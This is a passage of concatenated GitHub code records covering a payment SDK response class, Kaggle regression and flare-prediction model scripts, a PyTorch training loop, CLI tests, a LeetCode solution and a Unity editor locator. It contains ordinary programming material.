parsed_response_data.get(self.Fields.ORDER_ID, None)\n self._merchant_order_id = parsed_response_data.get(self.Fields.MERCHANT_ORDER_ID, None)\n self._amount = parsed_response_data.get(self.Fields.AMOUNT, None)\n self._currency = parsed_response_data.get(self.Fields.CURRENCY, None)\n self._customer_email = parsed_response_data.get(self.Fields.CUSTOMER_EMAIL, None)\n self._custom_param = parsed_response_data.get(self.Fields.CUSTOM_PARAM, None)\n self._request = parsed_response_data.get(self.Fields.REQUEST, None)\n\n @property\n def type(self):\n \"\"\"\n Getter for the type.\n\n Returns:\n\n \"\"\"\n return self._type\n\n @property\n def status(self):\n \"\"\"\n Getter for the status.\n\n Returns:\n\n \"\"\"\n return self._status\n\n @property\n def error_message(self):\n \"\"\"\n Getter for the actual error message.\n\n Returns:\n\n \"\"\"\n return self._error_message\n\n @property\n def is_ok(self):\n \"\"\"\n Flag whether the request went ok or not.\n\n Returns: True if there is no error else False\n\n \"\"\"\n return self._error_message is not None\n\n @property\n def processor_transaction_id(self):\n \"\"\"\n Getter for the processor transaction id.\n\n Returns:\n\n \"\"\"\n return self._processor_transaction_id\n\n @property\n def order_id(self):\n \"\"\"\n Getter for the order id.\n\n Returns:\n\n \"\"\"\n return self._order_id\n\n @property\n def merchant_order_id(self):\n \"\"\"\n Getter for the merchant order id.\n\n Returns:\n\n \"\"\"\n return self._merchant_order_id\n\n @property\n def amount(self):\n \"\"\"\n Getter for the amount.\n\n Returns:\n\n \"\"\"\n return self._amount\n\n @property\n def currency(self):\n \"\"\"\n Getter for the currency of the order.\n\n Returns:\n\n \"\"\"\n return self._currency\n\n @property\n def customer_email(self):\n \"\"\"\n Getter for the customer email.\n\n Returns:\n\n \"\"\"\n return self._customer_email\n\n @property\n def custom_param(self):\n \"\"\"\n Getter for the custom parameter passed to the api.\n\n Returns:\n\n \"\"\"\n return self._custom_param\n\n @property\n def request(self):\n \"\"\"\n Getter for the raw request as returned.\n\n Returns:\n\n \"\"\"\n return self._request\n","repo_name":"zotapay/python-sdk","sub_path":"zotapaysdk/mg_requests/order_status_response.py","file_name":"order_status_response.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21463059391","text":"import pandas as pd\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.metrics import mean_absolute_error\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeRegressor\r\n\r\n#Path of the file to read\r\niowa_file_path = \"E://Job Search//Learning//Machine Learning//Kaggle//Sample House Prediction//train.csv\"\r\n\r\nhome_data = pd.read_csv(iowa_file_path)\r\n\r\n#Create target object \r\ny = home_data.SalePrice\r\n\r\n#List of features \r\nfeatures = ['LotArea', 'YearBuilt', '1stFlrSF', '2ndFlrSF', 'FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\r\nX = home_data[features]\r\n\r\n#Split in to validation and training\r\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state =1)\r\n\r\n#Specify model\r\niowa_model = DecisionTreeRegressor(random_state=1)\r\n\r\n#Fit model\r\niowa_model.fit(train_X,train_y)\r\n\r\n#Make validation predictions and calculate mean absolute error\r\nval_predictions = iowa_model.predict(val_X)\r\nval_mae = mean_absolute_error(val_predictions, val_y)\r\nprint(f\"Validation MAE when not specifiying max_leaf_nodes: {val_mae}\")\r\n\r\n#using best value for max_leaf_nodes\r\ndef get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y):\r\n\tmodel = DecisionTreeRegressor(max_leaf_nodes=max_leaf_nodes, random_state=1)\r\n\tmodel.fit(train_X, train_y)\r\n\tpred_val = model.predict(val_X)\r\n\tmae = mean_absolute_error(val_y, pred_val)\r\n\treturn mae\r\n\r\ncandidate_max_leaf_nodes = [5,25,50,100,250,500]\r\nscores = {i: get_mae(i,train_X,val_X,train_y,val_y) for i in candidate_max_leaf_nodes}\r\nbest_tree_size = min(scores,key=scores.get)\r\n\r\niowa_model = DecisionTreeRegressor(max_leaf_nodes=best_tree_size, random_state =1)\r\niowa_model.fit(train_X, train_y)\r\nval_predictions = iowa_model.predict(val_X)\r\nval_mae = mean_absolute_error(val_y, val_predictions)\r\nprint(f\"Validation MAE for Best Value of Leaf Nodes: : {val_mae}\")\r\n\r\n#Define the model for Random Forest\r\nrf_model = RandomForestRegressor(random_state=1)\r\nrf_model.fit(train_X,train_y)\r\nrf_val_predictions = rf_model.predict(val_X)\r\nrf_val_mae = mean_absolute_error(rf_val_predictions, val_y)\r\nprint(f\"Validation MAE for Random Forest Model: {rf_val_mae}\")\r\n\r\n#Random Forest on Full Data\r\nrf_model_full_data = RandomForestRegressor(random_state=1)\r\nrf_model_full_data.fit(X,y)\r\n\r\n#Apply above model on test data\r\n\r\ntest_data_path = \"E://Job Search//Learning//Machine Learning//Kaggle//Sample House Prediction//test.csv\"\r\ntest_data = pd.read_csv(test_data_path)\r\n\r\ntest_X = test_data[features]\r\ntest_preds = rf_model_full_data.predict(test_X)\r\n\r\noutput = pd.DataFrame({\"Id\": test_data.Id, \"SalePrice\": test_preds})\r\nprint(output)\r\noutput.to_csv(\"test1_output.csv\", index=False)","repo_name":"rohitharyani/Kaggle","sub_path":"Sample House Prediction/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28263780158","text":"\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Flatten, Reshape\nfrom tensorflow.keras.layers import Conv2D, Conv2DTranspose\nfrom tensorflow.keras.layers import MaxPooling2D, Bidirectional, LSTM, Masking, GRU, RepeatVector, TimeDistributed, Conv1D, GlobalMaxPooling1D\nfrom tensorflow.keras.activations import relu, softplus\nfrom tensorflow.keras import regularizers\nimport matplotlib.pyplot as plt\n\nclass model_rnn(tf.keras.Model):\n def __init__(self, cfg):\n super().__init__()\n \n self.cfg = cfg\n \n self.x_dim = self.cfg.x_dim\n self.x2_dim = self.cfg.x2_dim\n self.y_dim = self.cfg.y_dim\n \n self.x_enc_init()\n self.x_dec_init()\n self.x_img_enc_init()\n self.x_img_dec_init()\n self.x2_enc_init()\n self.x2_dec_init()\n self.y_dec_init()\n \n self.loss_y = tf.keras.losses.CategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE)\n self.loss_x = tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.NONE)\n self.loss_x_img = tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.NONE)\n self.loss_x2 = tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.NONE)\n \n self.optimizer = tf.keras.optimizers.Adam(learning_rate=self.cfg.lr)\n \n class MyRegularizer(regularizers.Regularizer):\n\n def __init__(self, strength):\n self.strength = strength\n \n def __call__(self, x):\n return self.strength * tf.reduce_sum(tf.square(x))\n \n def x_enc_init(self):\n self.x_enc_hidden1 = LSTM(64, return_state=True)\n self.x_enc_hidden2 = LSTM(64, return_sequences=True)\n self.x_enc_pool = GlobalMaxPooling1D()\n self.x_enc_mean = Dense(self.cfg.z_dim)\n self.x_enc_var = Dense(self.cfg.z_dim)\n \n def x_dec_init(self):\n self.x_dec_rep = RepeatVector(self.x_dim[0])\n self.x_dec_hidden1 = LSTM(64, return_sequences=True)\n self.x_dec_hidden2 = Dense(64, activation='relu')\n self.x_dec_out = TimeDistributed(Dense(self.x_dim[1]))\n \n def x_img_enc_init(self):\n if self.cfg.network_type == 'recurrent':\n self.x_img_enc_conv1 = TimeDistributed(Conv2D(64, 3, (2,2), activation='relu', padding='same'))\n self.x_img_enc_conv2 = TimeDistributed(Conv2D(64, 3, (2,2), activation='relu', padding='same'))\n self.x_img_enc_flatten = TimeDistributed(Flatten())\n self.x_img_enc_hidden1 = LSTM(64, return_state=True)\n self.x_img_enc_hidden2 = LSTM(64, return_sequences=True)\n self.x_img_enc_pool = GlobalMaxPooling1D()\n elif self.cfg.network_type == 'dense':\n self.x_img_enc_conv1 = Conv2D(64, 3, (2,2), activation='relu', padding='same')\n self.x_img_enc_conv2 = Conv2D(64, 3, (2,2), activation='relu', padding='same')\n self.x_img_enc_flatten = Flatten()\n \n self.x_img_enc_mean = Dense(self.cfg.z_dim)\n self.x_img_enc_var = Dense(self.cfg.z_dim)\n def x_img_dec_init(self):\n self.x_img_dec_rep = RepeatVector(int(self.cfg.x_img_dim[0]/self.cfg.downsample_img)+1)\n self.x_img_dec_hidden1 = LSTM(64, return_sequences=True)\n if self.cfg.network_type == 'recurrent':\n self.x_img_dec_dense = TimeDistributed(Dense(int(self.cfg.x_img_dim[1]/4) * int(self.cfg.x_img_dim[2]/4) *64, activation='relu'))\n self.x_img_dec_conv1 = TimeDistributed(Conv2DTranspose(64, 3, 2, activation='relu', padding='same'))\n self.x_img_dec_conv2 = TimeDistributed(Conv2DTranspose(64, 3, 2, activation='relu', padding='same'))\n self.x_img_dec_conv3 = TimeDistributed(Conv2DTranspose(1, 3, 1, padding='same'))\n elif self.cfg.network_type == 'dense':\n self.x_img_dec_dense = Dense(int(self.cfg.x_img_dim[1]/4) * int(self.cfg.x_img_dim[2]/4) *64, activation='relu')\n self.x_img_dec_conv1 = Conv2DTranspose(64, 3, 2, activation='relu', padding='same')\n self.x_img_dec_conv2 = Conv2DTranspose(64, 3, 2, activation='relu', padding='same')\n self.x_img_dec_conv3 = Conv2DTranspose(1, 3, 1, padding='same')\n \n \n \n def x2_enc_init(self):\n self.x2_enc_hidden1 = LSTM(64, return_state=True) #batch_input_shape=(self.batch_size, self.x2_dim[0], self.x2_dim[1]))\n self.x2_enc_mean = Dense(self.cfg.z_dim)\n self.x2_enc_var = Dense(self.cfg.z_dim)\n def x2_dec_init(self):\n self.x2_dec_rep = RepeatVector(self.x2_dim[0])\n self.x2_dec_hidden1 = LSTM(64, return_sequences=True)\n self.x2_dec_hidden2 = Dense(64, activation='relu')\n self.x2_dec_out = TimeDistributed(Dense(self.x2_dim[1]))\n \n @tf.function\n def x_encode(self, x):\n if self.cfg.network_type == 'recurrent':\n zx = self.x_enc_hidden2(x)\n zx, h, c = self.x_enc_hidden1(zx)\n h = tf.concat([h, c], axis = -1)\n elif self.cfg.network_type == 'dense':\n h = x[:,-1,:]\n \n mean = self.x_enc_mean(h)\n logvar = self.x_enc_var(h)\n return mean, logvar\n @tf.function\n def x_decode(self, z):\n if self.cfg.network_type == 'recurrent':\n z = self.x_dec_rep(z)\n z = self.x_dec_hidden2(z)\n z = self.x_dec_hidden1(z)\n x = self.x_dec_out(z)\n elif self.cfg.network_type == 'dense':\n z = self.x_dec_rep(z)\n x = self.x_dec_out(z)\n \n return x\n \n \n @tf.function\n def x_img_encode(self, x):\n if self.cfg.network_type == 'recurrent':\n x = x[:, 0::self.cfg.downsample_img, :, :, :]\n h = self.x_img_enc_conv1(x)\n h = self.x_img_enc_conv2(h)\n h = self.x_img_enc_flatten(h)\n zx = self.x_img_enc_hidden2(h)\n zx, h, c = self.x_img_enc_hidden1(zx)\n h = tf.concat([h, c], axis = -1)\n elif self.cfg.network_type == 'dense':\n h = x[:,-1,:,:,:]\n h = self.x_img_enc_conv1(h)\n h = self.x_img_enc_conv2(h)\n h = self.x_img_enc_flatten(h)\n mean = self.x_img_enc_mean(h)\n logvar = self.x_img_enc_var(h)\n return mean, logvar\n @tf.function\n def x_img_decode(self, z):\n if self.cfg.network_type == 'recurrent':\n z = self.x_img_dec_rep(z)\n z = self.x_img_dec_hidden1(z)\n h = self.x_img_dec_dense(z)\n h = Reshape((-1, int(self.cfg.x_img_dim[1]/4) , int(self.cfg.x_img_dim[2]/4) , 64))(h)\n elif self.cfg.network_type == 'dense':\n h = self.x_img_dec_dense(z)\n h = Reshape((int(self.cfg.x_img_dim[1]/4) , int(self.cfg.x_img_dim[2]/4) , 64))(h)\n h = self.x_img_dec_conv1(h)\n h = self.x_img_dec_conv2(h)\n x = self.x_img_dec_conv3(h)\n return x\n \n @tf.function\n def x2_encode(self, x):\n if self.cfg.network_type == 'recurrent':\n zx, h, c = self.x2_enc_hidden1(x)\n h = tf.concat([h, c], axis = -1)\n elif self.cfg.network_type == 'dense':\n h = x[:,-1,:]\n mean = self.x2_enc_mean(h)\n logvar = self.x2_enc_var(h)\n return mean, logvar\n @tf.function\n def x2_decode(self, z):\n if self.cfg.network_type == 'recurrent':\n z = self.x2_dec_rep(z)\n z = self.x2_dec_hidden2(z)\n z = self.x2_dec_hidden1(z)\n x = self.x2_dec_out(z)\n elif self.cfg.network_type == 'dense':\n z = self.x2_dec_rep(z)\n x = self.x2_dec_out(z)\n return x\n \n \n def y_dec_init(self):\n self.y_dec1 = Dense(64, activation='relu')\n #self.y_dec2 = Dense(64, activation='relu')\n self.y_dec = Dense(self.y_dim)\n \n @tf.function\n def y_decode(self, z):\n #y = self.y_dec1(z)\n y = self.y_dec(z)\n return y\n \n @tf.function\n def kl_prior(self, mean, logvar, raxis=1):\n return -.5 * tf.reduce_sum( 1 + logvar - mean * mean - tf.exp(logvar) , axis=raxis)\n @tf.function\n def compute_kl(self, m_0, s_0, m_1, s_1):\n s_0 = tf.reshape(s_0, (-1, 1, self.cfg.z_dim))\n m_0 = tf.reshape(m_0, (-1, 1, self.cfg.z_dim))\n s_1 = tf.reshape(s_1, (1, -1, self.cfg.z_dim))\n m_1 = tf.reshape(m_1, (1, -1, self.cfg.z_dim))\n \n kl = tf.exp(s_0 - s_1)\n kl += s_1 - s_0\n kl += (m_1 - m_0) * (m_1 - m_0) * (1/tf.exp(s_1))\n kl = 0.5 * (tf.reduce_sum(kl, axis = -1) - self.cfg.z_dim)\n \n return kl\n \n @tf.function\n def reparameterize(self, mean, logvar):\n eps = tf.random.normal(shape=mean.shape)\n return eps * tf.exp(logvar * .5) + mean\n \n @tf.function\n def train_batch_classifier(self, data, train = True):\n \n with tf.GradientTape() as s_tape:\n loss_s, y_pred,_ = self.compute_loss(data, train = train)\n gradients = s_tape.gradient(loss_s, self.trainable_variables)\n \n self.optimizer.apply_gradients((grad, var) for (grad, var) in zip(gradients, self.trainable_variables) if grad is not None)\n \n return loss_s, y_pred\n \n @tf.function\n def compute_euc(self, m_0, m_1):\n \n m_0 = m_0 / tf.norm(m_0, axis = 1, keepdims = True)\n m_1 = m_1 / tf.norm(m_1, axis = 1, keepdims = True)\n \n m_0 = tf.reshape(m_0, (-1, 1, self.cfg.z_dim))\n m_1 = tf.reshape(m_1, (1, -1, self.cfg.z_dim))\n \n euc = (m_1 - m_0) * (m_1 - m_0)\n euc = tf.reduce_sum(euc, axis = -1) \n return euc\n \n @tf.function\n def compute_dot(self, m_0, m_1):\n m_0 = m_0 / tf.norm(m_0, axis = 1, keepdims = True)\n m_1 = m_1 / tf.norm(m_1, axis = 1, keepdims = True)\n return tf.matmul (m_0, tf.transpose(m_1))\n\n @tf.function\n def compute_loss(self, data, train = True):\n \n if not self.cfg.mdi_on and train:\n data = [data[i][0:16] for i in range(len(data))]\n \n y = data[0] # HMI Pars\n x = data[1] # HMI Image\n v = data[2] # MDI Pars\n r = data[4] # HMI Response\n mask = tf.cast(data[5], dtype = tf.float32)\n \n x = tf.expand_dims(x, -1)\n x = tf.image.per_image_standardization(x)\n n = r.shape[0]\n \n # Encoding\n mean_z = 0\n prec_z = 0\n if self.cfg.hmi_par_on:\n m_y, s_y = self.x_encode(y)\n prec_z += (1./tf.exp(s_y)) * mask[:,0:1] \n mean_z += m_y * (1./tf.exp(s_y)) * mask[:,0:1]\n if self.cfg.hmi_img_on:\n m_x, s_x = self.x_img_encode(x)\n prec_z += (1./tf.exp(s_x)) * mask[:,0:1] \n mean_z += m_x * (1./tf.exp(s_x)) * mask[:,0:1]\n if self.cfg.mdi_on:\n m_v, s_v = self.x2_encode(v)\n prec_z += (1./tf.exp(s_v)) * mask[:,1:2] \n mean_z += m_v * (1./tf.exp(s_v)) * mask[:,1:2] \n s_z = 1./prec_z\n m_z = mean_z * s_z\n s_z = tf.math.log(s_z)\n \n z = self.reparameterize(m_z, s_z)\n \n # Ranking\n \n loss_rank = 0\n if train:\n \n # HMI ranking\n dist = self.compute_euc(m_z[0:16], m_z[0:16])\n dist = tf.exp(-dist)\n \n sum_exp_negs = tf.reduce_sum(dist[0:8, 8:], axis = 1, keepdims=True)\n soft = dist[0:8, 0:8] / (dist[0:8, 0:8] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n sum_exp_negs = tf.reduce_sum(dist[8:, 0:8], axis = 1, keepdims=True)\n soft = dist[8:, 8:] / (dist[8:, 8:] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n # MDI ranking\n dist = self.compute_euc(m_z[16:32], m_z[16:32])\n dist = tf.exp(-dist)\n \n sum_exp_negs = tf.reduce_sum(dist[0:8, 8:], axis = 1, keepdims=True)\n soft = dist[0:8, 0:8] / (dist[0:8, 0:8] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n sum_exp_negs = tf.reduce_sum(dist[8:, 0:8], axis = 1, keepdims=True)\n soft = dist[8:, 8:] / (dist[8:, 8:] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n # Mutual ranking\n dist = self.compute_euc(m_y[32:48], m_v[32:48])\n dist = tf.exp(-dist)\n \n sum_exp_all = tf.reduce_sum(dist, axis = 1, keepdims=True)\n soft = tf.linalg.diag_part(dist) / sum_exp_all\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n \n \n # Reconstruction\n loss_rec = 0\n if self.cfg.hmi_par_on:\n y_rec = self.x_decode(z)\n if self.cfg.network_type == 'recurrent':\n loss_y = tf.reduce_mean(self.loss_x(y_rec, y), axis = -1)\n elif self.cfg.network_type == 'dense':\n loss_y = self.loss_x(y_rec, y)[:,-1]\n loss_rec += tf.reduce_sum(loss_y * mask[:,0])\n \n if self.cfg.hmi_img_on:\n x_rec = self.x_img_decode(z)\n if self.cfg.network_type == 'recurrent':\n loss_x = tf.reduce_sum(self.loss_x_img(x_rec, x[:,0::self.cfg.downsample_img]), axis = [1,2,3])\n elif self.cfg.network_type == 'dense':\n loss_x = tf.reduce_sum(self.loss_x_img(x_rec, x[:,-1]), axis = [1,2])\n loss_rec += tf.reduce_sum(loss_x * mask[:,0])\n \n if self.cfg.mdi_on:\n v_rec = self.x2_decode(z)\n if self.cfg.network_type == 'recurrent':\n loss_v = tf.reduce_mean(self.loss_x2(v_rec, v), axis = -1)\n elif self.cfg.network_type == 'dense':\n loss_v = self.loss_x2(v_rec, v)[:,-1]\n loss_rec += tf.reduce_sum(loss_v * mask[:,1])\n \n # KL prior\n log_prior = self.kl_prior(m_z, s_z)\n loss_prior = tf.reduce_sum(log_prior)\n \n # Regularization terms (JSD)\n if self.cfg.hmi_par_on and self.cfg.mdi_on:\n d = self.compute_kl(m_y, s_y, m_v, s_v)\n d = tf.linalg.diag_part(d)\n d2 = self.compute_kl(m_v, s_v, m_y, s_y)\n d2 = tf.linalg.diag_part(d2)\n loss_reg = tf.reduce_sum((d+d2)* mask[:,0] * mask[:,1]) * 1\n \n # Response decoding\n if train:\n logits = self.y_decode(z)\n else:\n logits = self.y_decode(m_z)\n loss_class = tf.reduce_sum(self.loss_y(r, logits) * mask[:,2]) * self.cfg.y_coef\n \n loss = 0\n if train:\n loss = 0*loss_rank + 1*loss_rec + 1*loss_prior + 1*loss_class + sum(self.losses)\n\n return tf.reduce_mean(loss), logits, m_z #/ tf.norm(m_z, axis = 1, keepdims = True)","repo_name":"maktukmak/multitask-flare-prediction","sub_path":"model_rnn.py","file_name":"model_rnn.py","file_ext":"py","file_size_in_byte":15178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70300905759","text":"from tqdm.auto import tqdm as tq\nimport numpy as np\nimport torch\n\nfrom os.path import join\n\nclass Runner():\n def __init__(self, model, criterion):\n self.model = model\n self.criterion = criterion\n\n def train(self, train_loader, valid_loader,\n optimizer, scheduler, valid_score_fn,\n n_epochs, train_on_gpu=False, verbose=False, rst_path=None):\n \"\"\"\n \n :param train_loader: \n :param valid_loader: \n :param optimizer: \n :param scheduler: \n :param valid_score_fn: \n :param n_epochs: \n :param train_on_gpu: \n :param verbose: \n :param rst_path: a string. \n Path to the folder where the error and the best model should be stored. \n :return: \n \"\"\"\n\n if train_on_gpu:\n self.model.cuda()\n\n train_loss_list, valid_loss_list, dice_score_list = [], [], []\n lr_rate_list = []\n valid_loss_min = np.Inf\n for epoch in range(1, n_epochs + 1):\n # keep track of training and validation loss\n train_loss = 0.0\n valid_loss = 0.0\n dice_score = 0.0\n\n ###################\n # train the model #\n ###################\n self.model.train()\n\n bar = tq(train_loader, postfix={\"train_loss\": 0.0})\n for data, target in bar:\n # move tensors to GPU if CUDA is available\n if train_on_gpu:\n data, target = data.cuda(), target.cuda()\n optimizer.zero_grad()\n # forward pass: compute predicted outputs by passing inputs to the model\n output = self.model(data)\n\n # calculate the batch loss\n loss = self.criterion(output, target)\n # backward pass: compute gradient of the loss with respect to model parameters\n loss.backward()\n # perform a single optimization step (parameter update)\n optimizer.step()\n\n train_loss += loss.item() * data.size(0)\n # print(\"Loss item: {}, data_size:{}\".format(loss.item(), data.size(0)))\n bar.set_postfix(ordered_dict={\"train_loss\": loss.item()})\n\n ######################\n # validate the model #\n ######################\n self.model.eval()\n del data, target\n with torch.no_grad():\n bar = tq(valid_loader, postfix={\"valid_loss\": 0.0, \"dice_score\": 0.0})\n for data, target in bar:\n # move tensors to GPU if CUDA is available\n if train_on_gpu:\n data, target = data.cuda(), target.cuda()\n\n output = self.model(data)\n loss = self.criterion(output, target)\n # update average validation loss\n valid_loss += loss.item() * data.size(0)\n dice_cof = valid_score_fn(output.cpu(), target.cpu()).item()\n dice_score += dice_cof * data.size(0)\n bar.set_postfix(ordered_dict={\"valid_loss\": loss.item(), \"dice_score\": dice_cof})\n\n # calculate average losses\n train_loss = train_loss / len(train_loader.dataset)\n valid_loss = valid_loss / len(valid_loader.dataset)\n dice_score = dice_score / len(valid_loader.dataset)\n train_loss_list.append(train_loss)\n valid_loss_list.append(valid_loss)\n dice_score_list.append(dice_score)\n lr_rate_list.append([param_group['lr'] for param_group in optimizer.param_groups])\n\n # print training/validation statistics\n print('Epoch: {} Training Loss: {:.6f} Validation Loss: {:.6f} Dice Score: {:.6f}'.format(\n epoch, train_loss, valid_loss, dice_score))\n\n if rst_path is not None:\n with open(join(rst_path, 'training_rst.txt'), 'w') as frst:\n frst.write(str(train_loss_list) + '\\n')\n frst.write(str(valid_loss_list) + '\\n')\n frst.write(str(dice_score_list) + '\\n')\n\n # save model if validation loss has decreased\n if valid_loss <= valid_loss_min:\n print('Validation loss decreased ({:.6f} --> {:.6f}). Saving model ...'.format(\n valid_loss_min,\n valid_loss))\n torch.save(self.model.state_dict(), join(rst_path, 'model_cifar.pt'))\n valid_loss_min = valid_loss\n\n scheduler.step(valid_loss)\n\n return train_loss_list, valid_loss_list, dice_score_list, lr_rate_list","repo_name":"lkforward/CloudFlower2","sub_path":"models/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14064305808","text":"#!/usr/bin/env python3\n\"\"\"tests for howler.py\"\"\"\n\nimport os\nimport re\nimport random\nimport string\nfrom subprocess import getstatusoutput, getoutput\n\nprg = './howler.py'\n\n\n# --------------------------------------------------\ndef random_string():\n \"\"\"generate a random string\"\"\"\n\n k = random.randint(5, 10)\n return ''.join(random.choices(string.ascii_letters + string.digits, k=k))\n\n\n# --------------------------------------------------\ndef out_flag():\n \"\"\"Either -o or --outfile\"\"\"\n\n return '-o' if random.randint(0, 1) else '--outfile'\n\n\n# --------------------------------------------------\ndef test_exists():\n \"\"\"exists\"\"\"\n\n assert os.path.isfile(prg)\n\n\n# --------------------------------------------------\ndef test_usage():\n \"\"\"usage\"\"\"\n\n for flag in ['-h', '--help']:\n rv, out = getstatusoutput(f'{prg} {flag}')\n assert rv == 0\n assert re.match(\"usage\", out, re.IGNORECASE)\n\n\n# --------------------------------------------------\ndef test_text_stdout():\n \"\"\"Test STDIN/STDOUT\"\"\"\n\n out = getoutput(f'{prg} \"foo bar baz\"')\n assert out.strip() == 'FOO BAR BAZ'\n\n\n# --------------------------------------------------\ndef test_text_outfile():\n \"\"\"Test STDIN/outfile\"\"\"\n\n out_file = random_string()\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n try:\n out = getoutput(f'{prg} {out_flag()} {out_file} \"foo bar baz\"')\n assert out.strip() == ''\n assert os.path.isfile(out_file)\n text = open(out_file).read().rstrip()\n assert text == 'FOO BAR BAZ'\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n\n# --------------------------------------------------\ndef test_file():\n \"\"\"Test file in/out\"\"\"\n\n for expected_file in os.listdir('test-outs'):\n try:\n out_file = random_string()\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n basename = os.path.basename(expected_file)\n in_file = os.path.join('../inputs', basename)\n out = getoutput(f'{prg} {out_flag()} {out_file} {in_file}')\n assert out.strip() == ''\n produced = open(out_file).read().rstrip()\n expected = open(os.path.join('test-outs',\n expected_file)).read().strip()\n assert expected == produced\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)\n","repo_name":"kyclark/tiny_python_projects","sub_path":"05_howler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":1267,"dataset":"github-code","pt":"51"} +{"seq_id":"14639858254","text":"# http://leetcode.com/problems/maximal-square/\ndef solve(matrix):\n maxCount = 0\n # iterate over the matrix\n # for each cell check if it contains a 1, if it does, increase the size of the square and check again\n for rowIndex, row in enumerate(matrix):\n for valIndex, val in enumerate(row):\n maxColDim = len(matrix[0]) - valIndex\n maxRowDim = len(matrix) - rowIndex\n maxDim = maxColDim if maxColDim < maxRowDim else maxRowDim\n for i in range(maxDim):\n dim = i + 1\n if validateOuterEdges(matrix, rowIndex, valIndex, dim):\n count = dim * dim\n if (count > maxCount):\n maxCount = count\n else:\n break\n\n return maxCount\n\ndef validateArea(matrix, rowOffset, itemOffset, dim):\n for r in range(dim):\n for c in range(dim):\n cix = itemOffset + c\n rix = rowOffset + r\n if matrix[rix][cix] == 0:\n return False\n return True\n\ndef validateOuterEdges(matrix, rowOffset, itemOffset, dim):\n # check column\n for ro in range(dim):\n if matrix[rowOffset+ro][itemOffset+dim-1] == 0:\n return False\n # check row\n for co in range(dim):\n if matrix[rowOffset+dim-1][itemOffset+co] == 0:\n return False\n return True\n\nif __name__ == '__main__':\n count = solve([\n [1, 0, 1, 0, 0],\n [1, 0, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 0, 0, 1, 0]\n ])\n print(f\"expected 4 got {count}\")\n\n count = solve([\n [1, 0, 1, 0, 0, 1],\n [1, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 0],\n [1, 0, 1, 0, 0, 1],\n ])\n print(f\"expected 9 got {count}\")\n\n count = solve([\n [0, 1],\n [1, 0],\n ])\n print(f\"expected 1 got {count}\")\n\n count = solve([\n [1, 0],\n ])\n print(f\"expected 1 got {count}\")\n","repo_name":"chrisolsen/daily-interview-pro","sub_path":"find_largest_square.py","file_name":"find_largest_square.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"12715141691","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import annotations\nfrom datetime import datetime\nfrom json import dumps, loads\nfrom os import chdir, getcwd, walk\nfrom pathlib import Path\nfrom platform import system\nfrom re import match\nfrom shutil import copyfile, move, rmtree\nfrom typing import Callable, List\n\nfrom funity.unity_version import UnityVersion\nfrom funity.util import run_process\n\n\ndef __find_darwin(search_dir: str) -> List[str]:\n search_path = Path(search_dir)\n editor_dirs = []\n for root, dirs, _ in walk(search_path):\n root_path = Path(root)\n if not root_path.name == 'Unity.app':\n continue\n dirs[:] = []\n editor_dirs.append(str(root_path.parent))\n\n return editor_dirs\n\n\ndef __find_linux(search_dir: str) -> List[str]:\n search_path = Path(search_dir)\n editor_dirs = []\n for root, dirs, files in walk(search_path):\n root_path = Path(root)\n if 'Editor' != root_path.name:\n continue\n if 'Unity' not in files:\n continue\n dirs[:] = []\n editor_dirs.append(str(root_path.parent))\n\n return editor_dirs\n\n\ndef __find_windows(search_dir: str) -> List[str]:\n search_path = Path(search_dir)\n editor_dirs = []\n for root, dirs, files in walk(search_path):\n root_path = Path(root)\n if 'Editor' != root_path.name:\n continue\n if 'Unity.exe' not in files:\n continue\n dirs[:] = []\n editor_dirs.append(str(root_path.parent))\n\n return editor_dirs\n\n\ndef __get_version_darwin(app: str) -> UnityVersion:\n version = 0, 0, 0, 0\n version_str = str()\n\n def log_func(line: str):\n nonlocal version_str\n if line.startswith(': kMDItemVersion'):\n version_str = line.rstrip()\n\n return_code = run_process(['mdls', app], log_func=log_func)\n\n if return_code == 0 and version_str:\n regex_match = match(':\\\\s*kMDItemVersion\\\\s*=\\\\s*\"Unity version (\\\\d+).(\\\\d+).(\\\\d+)f(\\\\d+)\"', version_str)\n version = 